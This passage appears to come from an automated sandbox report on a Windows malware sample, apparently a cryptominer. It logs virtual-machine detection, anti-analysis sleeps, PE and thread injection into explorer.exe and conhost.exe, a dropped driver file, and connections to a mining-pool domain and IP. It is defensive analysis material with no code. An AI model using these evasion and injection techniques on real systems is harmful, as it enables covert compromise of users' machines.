Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation Jump to behavior
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1836 Thread sleep time: -16602069666338586s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window / User API: threadDelayed 3398 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window / User API: threadDelayed 5671 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to dropped file
Is looking for software installed on the system
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: conhost.exe, 00000011.00000003.755448964.00000201F483F000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
Source: AppLaunch.exe, 00000001.00000002.739738609.000000000A288000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_2_004074B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004074B7

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: mine.bmpool.org
Source: C:\Windows\explorer.exe Network Connect: 157.90.156.89 116 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1B0F37B0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 201F1F70000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 224D5930000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 25F9A6F0000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Thread created: C:\Windows\System32\conhost.exe EIP: F37B0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: F1F70000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: D5930000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 9A6F0000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: D3B008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: F18008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Memory written: C:\Windows\System32\conhost.exe base: 1B0F37B0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 201F1F70000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 2E2010 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 224D5930000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 10FF010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory written: C:\Windows\System32\conhost.exe base: 25F9A6F0000 Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140000000 value: 4D Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140001000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140367000 value: 1E Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 1404A0000 value: F0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140753000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140775000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140776000 value: C5 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140777000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140779000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 14077B000 value: 60 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 14077C000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 14077D000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 2E2010 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140000000 value: 4D Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140001000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140367000 value: 1E Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 1404A0000 value: F0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140753000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140775000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140776000 value: C5 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140777000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140779000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 14077B000 value: 60 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 14077C000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 14077D000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 10FF010 value: 00 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6924 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 4876 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
